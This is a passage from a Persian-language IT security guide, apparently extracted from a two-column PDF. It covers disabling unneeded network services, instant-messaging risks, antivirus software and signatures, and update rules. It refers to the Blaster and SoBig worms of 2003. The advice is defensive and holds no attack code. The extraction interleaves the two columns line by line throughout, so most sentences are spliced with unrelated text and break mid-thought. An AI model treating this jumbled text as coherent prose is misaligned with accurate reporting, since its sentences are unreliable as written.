‫ﻣﺸﻜﻼﺕ ﻫﺴﺘﻨﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻋﻠﻴﺮﻏﻢ ﻋﻼﻗـﺔ ﺁﻧﻬـﺎ ﺑـﻪ ﺗﻮﺳـﻌﻪ ﻭ‬ ‫ﻧﻤﻲﺷﻮﺩ‪.‬‬
‫ﻋﺮﺿﺔ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﺑﺎ ﺗﻮﺍﻧﻤﻨﺪﻳﻬﺎﻱ ﺯﻳﺎﺩ‪ ،‬ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑـﺎ‬ ‫ﻧﻴﺎﺯﻱ ﻧﻴﺴﺖ ﻛـﻪ ﺁﺩﺭﺱ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ )ﻭ ﻫﻮﻳـﺖ(‬ ‫•‬
‫ﺧﺪﻣﺎﺕ ﻓﺮﻋﻲ ﻏﻴﺮﻓﻌﺎﻝﺷﺪﻩ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ؛ ﻭ ﻛﺎﺭﺑﺮ ﺩﺭﺻﻮﺭﺕ‬ ‫ﺧــﻮﺩ ﺭﺍ ﺑــﺮﺍﻱ ﺳــﺎﻳﺮ ﺷــﺮﻛﺖﻛﻨﻨــﺪﮔﺎﻥ ﺩﺭ ﮔﻔﺘﮕﻮﻫــﺎﻱ‬
‫ﻧﻴﺎﺯ ﻣﻲﺗﻮﺍﻧﺪ ﻫﺮﻳـﻚ ﺍﺯ ﺁﻧﻬـﺎ ﺭﺍ ﻓﻌـﺎﻝ ﺳـﺎﺯﺩ‪ .‬ﻏﻴﺮﻓﻌـﺎﻝ ﺑـﻮﺩﻥ‬
‫ﺍﻧﺠﺎﻡﺷﺪﻩ ﺩﺭ ﭘﻴﺎﻣﻬﺎﻱ ﻓﻮﺭﻱ ﻓﺎﺵ ﻛﻨﻴﺪ‪.‬‬
‫ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺧﺎﺻﻲ ﻧﻤـﻲﺷـﻮﺩ ﺍﻫﻤﻴـﺖ ﺯﻳـﺎﺩﻱ‬
‫ﺩﺍﺭﺩ‪ .‬ﭼﻨــﻴﻦ ﺧــﺪﻣﺎﺗﻲ ﺷــﺎﻣﻞ ﺍﺷــﺘﺮﺍﻙ ﻓﺎﻳﻠﻬــﺎ ﻭ ﭼــﺎﭘﮕﺮ‪،‬‬ ‫ﺩﺭ ﻣﻮﺍﺭﺩ ﺧﺎﺹ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﻧﺴﺒﺖ ﺑـﻪ‬
‫ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩﻫــﺎﻱ ﻭﺏ‪ ،‬ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩﻫــﺎﻱ ﭘــﺴﺖ‬ ‫ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺭﺟﺢ ﺍﺳﺖ‪ .‬ﺩﺭﻧﻈﺮ ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ‪ ،‬ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩﻫــﺎﻱ ﭘﺮﻭﺗﻜــﻞ ﺍﻧﺘﻘــﺎﻝ ﻓﺎﻳــﻞ‬ ‫ﺳﺮﻭﻳﺲ ﺍﻳﻤﻦﺗﺮ ﻧﻴﺰ ﻫﺴﺖ؛ ﭼﺮﺍﻛﻪ ﭘﻴﺎﻣﻬﺎ ﺩﺭ ﻣﻜﺎﻧﻬـﺎﻱ ﺩﻳﮕـﺮ‬
‫)‪ ،١٠٤(FTP Servers‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻓﺮﺍﺧـﻮﺍﻧﻲ ﺗـﺎﺑﻊ ﺍﺯ ﺭﺍﻩ‬ ‫ﺩﻳﺴﻚ ﻛﭙﻲ ﻧﻤﻲﺷﻮﻧﺪ‪ ،‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺩﺭ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻳـﻦ‬
‫ﺩﻭﺭ )‪ ١٠٥(RPC Servers‬ﻭ ﻏﻴﺮﻩ ﻣﻲﺑﺎﺷﻨﺪ‪.‬‬ ‫ﺍﺗﻔﺎﻕ ﻣﻲﺍﻓﺘﺪ‪ .‬ﺑﻪ ﻫﺮﺣﺎﻝ ﻫﻨﻮﺯ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻫﺸﺪﺍﺭ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ‬
‫ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﭘﻴﺎﻣﻬﺎﻱ ﻓﻮﺭﻱ ﺁﻧﻬﺎ ﺍﻳﻤﻦ ﻧﺒﺎﺷﺪ‪ .‬ﻣﺸﻜﻞ ﺍﺻﻠﻲ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﺍﻳﻦ ﺍﺳﺖ ﻛـﻪ ﺑﻌـﻀﻲ ﺍﺯ ﺁﻧﻬـﺎ ﻗﺎﺑﻠﻴـﺖ‬
‫ﺍﻧﺘﻘــﺎﻝ ﻓﺎﻳــﻞ ﻫــﻢ ﺩﺍﺭﻧــﺪ‪ .‬ﺍﻳــﻦ ﻣﻮﺿــﻮﻉ ﺁﻧﻬــﺎ ﺭﺍ ﻣﺎﻧﻨــﺪ ﺳــﺎﻳﺮ‬
‫ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺷﺘﺮﻙ ﻓﺎﻳﻞ ‪ -‬ﻣﺜﻞ ﺿﻤﺎﺋﻢ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ‪-‬‬
‫ﺩﭼﺎﺭ ﻣﺸﻜﻞ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺭﺳﺎﻝ ﭘﻴـﺎﻡ ﻓـﻮﺭﻱ‬
‫ﺍﺟﺎﺯﺓ ﺍﺟﺮﺍﻱ ﺩﺳـﺘﻮﺭﺍﺕ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺭﺍ ﻧﻴـﺰ ﻣـﻲﺩﻫﻨـﺪ ﻭ ﺍﻳﻨﻜـﺎﺭ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﻣﻨﺠﺮ ﺑﻪ ﻭﻗﻮﻉ ﺗﻬﺎﺟﻢ ﮔﺮﺩﺩ‪.‬‬

‫ﺧﺪﻣﺎﺕ ﻓﻌﺎﻝ ﻏﻴﺮﺿﺮﻭﺭﻱ‬


‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﺑـﺴﻴﺎﺭ ﻗﺪﺭﺗﻤﻨـﺪ ﻭ ﻛـﺎﺭﺁ‬
‫ﻫﺴﺘﻨﺪ‪ .‬ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ ﻛﺎﺭﺑﺮ ﻋﺎﺩﻱ ﺗﻤﺎﻡ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﻣﻮﺟـﻮﺩ ﺩﺭ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺭﺍ ﻻﺯﻡ ﻧﺪﺍﺭﺩ‪ .‬ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﻧﻴـﺴﺘﻨﺪ ﺑﺎﻳـﺪ‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﺷﻮﻧﺪ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﺑﻌﻀﻲ ﺍﺯ ﻋﺮﺿـﻪﻛﻨﻨـﺪﮔﺎﻥ ﻧـﺮﻡﺍﻓـﺰﺍﺭ‬
‫ﺗﻤﺎﻣﻲ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﻓﻌﺎﻝ ﻣﻲﻛﻨﻨﺪ ﻭ ﺑﺴﺘﮕﻲ ﺑﻪ‬
‫‪104 File Transfer Protocol Servers‬‬ ‫ﻛﺎﺭﺑﺮ ﺩﺍﺭﺩ ﻛﻪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﻳﺎ ﻧﻜﻨـﺪ‪ ،‬ﻭ ﺩﺭ ﻏﺎﻟـﺐ ﻣـﻮﺍﺭﺩ‬
‫‪105 Remote Procedure Call Servers‬‬
‫‪٩٣‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ ﺑﻪ ﺭﻭﺷﻬﺎﻱ ﺯﻳﺮ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﺍﺯ ﻭﻳﺮﻭﺳﻬﺎ‪ ،‬ﻛﺮﻣﻬـﺎ‬


‫ﻭ ﺗﺮﺍﻭﺍﻫﺎﻱ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﺍﻳﻤﻦ ﻣﻲﺳﺎﺯﻧﺪ‪:‬‬
‫ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺑﻪ ﻓﺎﻳﻠﻲ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻳـﺎ ﺁﻧـﺮﺍ‬ ‫•‬
‫ﻛﭙﻲ‪ ،‬ﺫﺧﻴﺮﻩ‪ ،‬ﻣﻨﺘﻘﻞ‪ ،‬ﺑﺎﺯ ﻳﺎ ﺑﺴﺘﻪ ﻧﻤﺎﻳﻴﺪ‪ ،‬ﺟﻠـﻮﻱ ﺁﺳـﻴﺐ‬
‫ﺭﺳﺎﻧﺪﻥ ﻭﻳﺮﻭﺳﻬﺎ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬ ‫ﻓﺼﻞ ﻫﻔﺘﻢ‬
‫ﻫﺮﮔﺎﻩ ﻳﻚ ﺩﻳﺴﻚ ﺧﺎﺭﺟﻲ ﻭﺍﺭﺩ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩ ﻛﻨﻴﺪ ﺁﻧـﺮﺍ‬ ‫•‬ ‫ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ‬
‫ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻭﻳﺮﻭﺳﻬﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﺑﺮﺭﺳﻲ ﻣﻲﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭﻳﺎﻓﺖ ﺷـﻮﺩ‪ ،‬ﺧـﻮﺩ‬ ‫•‬


‫ﻛﻠﻴﺎﺕ‬
‫ﻧﺎﻣﻪ ﻭ ﺿﻤﺎﺋﻢ ﺁﻥ ﺑﺮﺍﻱ ﻋﺎﺭﻱ ﺑﻮﺩﻥ ﺍﺯ ﻫﺮ ﻧﻮﻉ ﻭﻳـﺮﻭﺱ‬ ‫ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﻣﻨﻴﺘﻲ ﻭ ﺭﻭﺷﻬﺎﻱ ﺍﻓـﺰﺍﻳﺶ‬
‫ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬ ‫ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪﻫﺎ ﻭ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ .‬ﻣﻨﻈﻮﺭ ﺍﺯ‬
‫ﻫﺮﮔﺎﻩ ﻓـﺎﻳﻠﻲ ﺍﺯ ﻳـﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ‪ download‬ﺷـﻮﺩ‬ ‫•‬
‫ﺑﺴﺘﻪ ﻫﺎﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺍﻣﻨﻴﺘﻲ ﻫﻤﺎﻥ ﻭﻳﺮﻭﺱ ﻳﺎﺑﻬﺎ‪ ،‬ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ‬
‫ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪.‬‬ ‫ﺁﺗﺶ‪ ،‬ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﺳﺖ‪.‬‬

‫ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﺻﻔﺤﺔ ﻭﺏ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ‬ ‫•‬ ‫ﻭﻳﺮﻭﺱﻳﺎﺏ‬


‫ﺟﺎﺳﺎﺯﻱ ﺷﺪﻩ ﺩﺭ ﺁﻥ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ‪ download‬ﺷـﻮﺩ‬
‫ﺑﺮﺭﺳﻲ ﻣﻲﮔﺮﺩﺩ‪.‬‬ ‫ﻗﺎﻧﻮﻥ ﺑﻴﺴﺘﻢ‪:‬‬
‫ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﻳـﻚ ﻓﺎﻳـﻞ‪،‬‬ ‫•‬ ‫ﺭﻭﻱ ﻫﺮ ﺭﺍﻳﺎﻧﺔ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻧﺴﺒﺖ ﺑﻪ ﻭﻳـﺮﻭﺱ ﺑﺎﻳـﺪ‬
‫ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﻭ ﻳﺎ ﺗﻤﺎﻣﻲ ﺩﻳـﺴﻜﻬﺎﻱ ﻣﻮﺟـﻮﺩ ﺭﺍ‬ ‫ﻧــﺮﻡﺍﻓــﺰﺍﺭ ﺿــﺪﻭﻳﺮﻭﺱ ﻧــﺼﺐ ﺷــﻮﺩ ﻭ ﻫــﺮ ﺭﻭﺯ‬
‫ﺑﺮﺍﻱ ﻭﻳﺮﻭﺱ ﺑﺮﺭﺳﻲ ﻧﻤﺎﻳﻴﺪ‪.‬‬ ‫ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﮔﺮﺩﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺩﺳﺘﮕﺎﻩ ﺑﺎﻳﺪ ﺑـﺼﻮﺭﺕ‬
‫ﺩﻭﺭﻩﺍﻱ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻭﻳﺮﻭﺱ ﺟﺴﺘﺠﻮﻱ ﻛﺎﻣﻞ ﺷﻮﺩ‪.‬‬
‫ﺍﮔﺮ ﻳﻚ ﻭﻳﺮﻭﺱ‪ ،‬ﻛﺮﻡ‪ ،‬ﻳﺎ ﺗﺮﺍﻭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﺷﻮﺩ‪ ،‬ﺍﻳﻦ ﺍﺑﺰﺍﺭ‬ ‫•‬
‫ﺁﻧﺮﺍ ﺍﺯ ﺑﻴﻦ ﻣﻲﺑﺮﺩ ﻳﺎ ﺍﮔﺮ ﻧﺘﻮﺍﻧﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫـﺪ ﺑـﻪ‬
‫ﻗﺎﻧﻮﻥ ﺑﻴﺴﺖ ﻭ ﻳﻜﻢ‪:‬‬
‫ﺷﻤﺎ ﺍﻃﻼﻉ ﻣﻲﺩﻫﺪ ﻛﻪ ﺍﻳﻦ ﻣﺸﻜﻞ ﻗﺎﺑﻞ ﺭﻓﻊ ﻧﻴـﺴﺖ؛ ﻭ‬
‫ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻭﻳﺮﻭﺳـﻬﺎ ﻗـﺮﺍﺭ‬
‫ﺩﺭﻧﺘﻴﺠﻪ ﻓﺎﻳﻞ ﺧﺮﺍﺏ ﺭﺍ ﻗﺮﻧﻄﻴﻨﻪ ﻣﻲﻛﻨﺪ ﻭ ﺑﺪﻳﻨﻮﺳـﻴﻠﻪ ﺍﺯ‬
‫ﻧﻤﻲﮔﻴﺮﻧـﺪ )ﻣﺎﻧﻨـﺪ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ ‪ (Unix‬ﺑﺎﻳـﺪ‬
‫ﺁﺳﻴﺐ ﺩﻳﺪﻥ ﺳﺎﻳﺮ ﻗﺴﻤﺘﻬﺎﻱ ﺳﻴـﺴﺘﻢ ﻓﺎﻳـﻞ ﺟﻠـﻮﮔﻴﺮﻱ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﺷﻮﺩ ﻛﻪ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﺭﺳـﺎﻟﻲ‬
‫ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
‫‪١٠٦‬‬
‫ﺣﺎﻭﻱ ﻭﻳﺮﻭﺱ ﻧﻴﺴﺖ ﺗـﺎ ﺑـﻪ ﮔﻴﺮﻧـﺪﻩ ﻧﻴـﺰ ﺁﺳـﻴﺒﻲ‬
‫ﻭﺟــﻮﺩ ﻳــﻚ ﻭﻳــﺮﻭﺱﻳــﺎﺏ ﺣــﺎﻭﻱ ﻧــﺸﺎﻧﻬﺎﻱ ﻭﻳــﺮﻭﺱ‬
‫ﻧﺮﺳﺪ‪.‬‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺷﺪﻩ )"ﻧﺸﺎﻥ" ﻣﺸﺨﺼﺔ ﺧﺎﺻﻲ ﺍﺯ ﻳﻚ ﻭﻳـﺮﻭﺱ ﺍﺳـﺖ ﻛـﻪ‬
‫ﻭﻳﺮﻭﺱﻳﺎﺏ ﺗﻮﺳﻂ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﻧﻮﻉ ﻭﻳﺮﻭﺱ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫـﺪ(‪ ،‬ﻳﻜـﻲ ﺍﺯ‬ ‫ﻗﺎﻧﻮﻥ ﺑﻴﺴﺖ ﻭ ﺩﻭﻡ‪:‬‬
‫ﻣﻬﻤﺘﺮﻳﻦ ﻗﺴﻤﺘﻬﺎﻳﻲ ﺍﺯ ﻳﻚ ﺷـﺒﻜﻪ ﺍﺳـﺖ ﻛـﻪ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﻪ‬ ‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻬﻢ ﺧﻮﺩ ﺭﺍ‬
‫ﺍﻳﻨﺘﺮﻧــﺖ ﻣﺘــﺼﻞ ﺑﺎﺷــﺪ‪ .‬ﺗﻮﺟــﻪ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﺑﺘــﺎﺯﮔﻲ‬ ‫ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﻤﺎﻳﻴﺪ ﻭ ﺑﻪ ﺧﺎﻃﺮ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ‬
‫ﻭﻳﺮﻭﺳﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻣﺤﻴﻂ ‪ UNIX‬ﺩﺭﺣﺎﻝ ﮔﺴﺘﺮﺵ ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻣـﺎ‬
‫ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ ﺗﻨﻬﺎ ﻭﻳﺮﻭﺳﻬﺎﻱ ﻣﻬﺎﺟﻢ ﺑـﻪ ﻓﺎﻳﻠﻬـﺎ ﺭﺍ‬
‫ﻛﺮﻣﻬﺎ ﻭ ﺗﺮﺍﻭﺍﻫﺎ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﺤﻴﻂ ﺍﺯ ﻗﺒﻞ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪﺍﻧﺪ‪.‬‬
‫ﺑﺮﺭﺳــﻲ ﻣــﻲﻛﻨﻨــﺪ؛ ﺩﺭﺣﺎﻟﻴﻜــﻪ ﺁﺳــﻴﺐﭘــﺬﻳﺮﻱ‬
‫ﺗﺎ ﺍﻭﺍﺧﺮ ﺁﮔﻮﺳﺖ ‪ ۲۰۰۳‬ﻳﻜـﻲ ﺍﺯ ﺿﺪﻭﻳﺮﻭﺳـﻬﺎﻱ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ‬ ‫ﺳﻴﺴﺘﻢ ﻋﺎﻣﻠﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﺷﺨــــﺼﻲ ﻭ ‪) Macintosh‬ﺿــــﺪﻭﻳﺮﻭﺱ ‪ (Norton‬ﺗﻘﺮﻳﺒــــﹰﺎ‬ ‫ﻣﻮﺟﺐ ﺁﺳﻴﺐ ﺩﻳﺪﻥ ﺳﻴﺴﺘﻢ ﺍﺯ ﺍﺑﻌﺎﺩ ﺩﻳﮕﺮ ﺷﻮﻧﺪ‪.‬‬

‫‪106 Virus Signatures‬‬


‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٩٤‬‬

‫ﭘﻴﺎﻣﻬﺎﻱ ﺍﺭﺳﺎﻟﻲ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨـﺪ ‪ -‬ﺭﺍ ﻧﻴـﺰ‬ ‫ﻣﻲﺗﻮﺍﻧﺴﺖ ‪ ۶۵۰۰۰‬ﻭﻳﺮﻭﺱ ﻣﺨﺘﻠﻒ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ‪ .‬ﺁﮔﻮﺳﺖ‬
‫ﺩﺭﻳﺎﺑﻴﺪ‪ .‬ﺍﮔﺮ ﺑﺎ ﭘﺮﻭﺗﻜﻞ ‪ TCP/IP‬ﺁﺷﻨﺎ ﻫـﺴﺘﻴﺪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ‬ ‫‪ ۲۰۰۳‬ﺍﺯ ﻧﻈﺮ ﺍﻧﺘﺸﺎﺭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻣﺨـﺮﺏ ﻣـﺎﻩ ﺟـﺎﻟﺒﻲ ﺑـﻮﺩ‪،‬‬
‫ﻓﺼﻞ ﺑﻌﺪﻱ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺍﻣﺎ ﺍﮔﺮ ﺁﻧﺮﺍ ﻧﻤﻲﺷﻨﺎﺳﻴﺪ ﺍﺑﺘﺪﺍ ﺿﻤﻴﻤﺔ‬ ‫ﭼﺮﺍﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺮﻣﻬﺎ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﺎﻩ ﻣﻨﺘـﺸﺮ ﺷـﺪﻧﺪ ﺍﺯ ﻳـﻚ‬
‫‪ ۲‬ﻫﻤﻴﻦ ﺑﺨﺶ ﺭﺍ ﻣﻄﺎﻟﻌﻪ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﺗﻮﺟـﻪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﺣﺘـﻲ‬ ‫ﺁﺳــﻴﺐﭘــﺬﻳﺮﻱ ﺑــﺴﻴﺎﺭ ﺣﻴــﺎﺗﻲ ﺩﺭ ﺳﻴــﺴﺘﻢﻋﺎﻣــﻞ ‪Windows‬‬
‫ﺩﺭﺻــﻮﺭﺗﻴﻜﻪ ﻧﺨﻮﺍﻫﻴــﺪ ﺍﻳــﻦ ﺟﺰﺋﻴــﺎﺕ ﺭﺍ ﺑﻴﺎﻣﻮﺯﻳــﺪ ﻫﻤﭽﻨــﺎﻥ‬ ‫ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻣﻲﻛﺮﺩﻧﺪ )‪ Blaster‬ﻭ ‪ SoBig‬ﺍﺯ ﺭﺍﻳﺠﺘﺮﻳﻦ ﺁﻧﻬﺎ ﺑﻮﺩﻧـﺪ(‪.‬‬
‫ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﺩﺭ ﺍﺩﺍﻣﻪ ﺗﻤـﺎﻣﻲ ﺁﻧﭽـﻪ‬ ‫ﻳﻜﻤﺎﻩ ﭘﻴﺸﺘﺮ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺑﺮﺍﻱ ﺁﻥ ﻭﺻﻠﻪﺍﻱ ﻣﻨﺘﺸﺮ ﻛﺮﺩﻩ ﺑﻮﺩ‪،‬‬
‫ﻛﻪ ﻻﺯﻡ ﺍﺳﺖ ﺑﺼﻮﺭﺕ ﺧﻼﺻﻪ ﺩﺭ ﻣﻮﺭﺩ ‪ TCP/IP‬ﺑﺪﺍﻧﻴﺪ ﺫﻛـﺮ‬ ‫ﺍﻣﺎ ﺍﻓﺮﺍﺩ ﻛﻤﻲ ﺁﻧﺮﺍ ﻧﺼﺐ ﻛﺮﺩﻩ ﺑﻮﺩﻧﺪ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻛﺮﻣﻬﺎﻱ‬
‫ﻣﻲﺷﻮﺩ‪:‬‬ ‫ﺟﺪﻳﺪ ﺗﻮﺍﻧـﺴﺘﻨﺪ ﺑـﻪ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ ﺯﻳـﺎﺩﻱ ﺁﺳـﻴﺐ ﺑﺰﻧﻨـﺪ ﻭ ﺑـﻪ‬
‫ﺳﺮﻋﺖ ﺩﺭ ﺁﻧﻬﺎ ﭘﺨﺶ ﺷﻮﻧﺪ؛ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺷﺎﻳﺪ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ‬
‫ﺩﺳﺘﮕﺎﻫﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﻫﺴﺘﻨﺪ ﺩﺍﺭﺍﻱ ﻳـﻚ‬ ‫•‬
‫ﺭﻛﻮﺭﺩﻫﺎﻱ ﺟﺪﻳﺪﻱ ﺑﻪ ﺛﺒﺖ ﺭﺳﻴﺪﻩ ﺑﺎﺷﺪ‪ .‬ﺩﺭ ﺷﻠﻮﻏﺘﺮﻳﻦ ﺭﻭﺯ ﺁﻥ‬
‫ﺁﺩﺭﺱ ‪ IP‬ﺑﻪ ﺷﻜﻞ ‪ 12.222.103.43‬ﻣﻲ ﺑﺎﺷﻨﺪ ﻛـﻪ‬
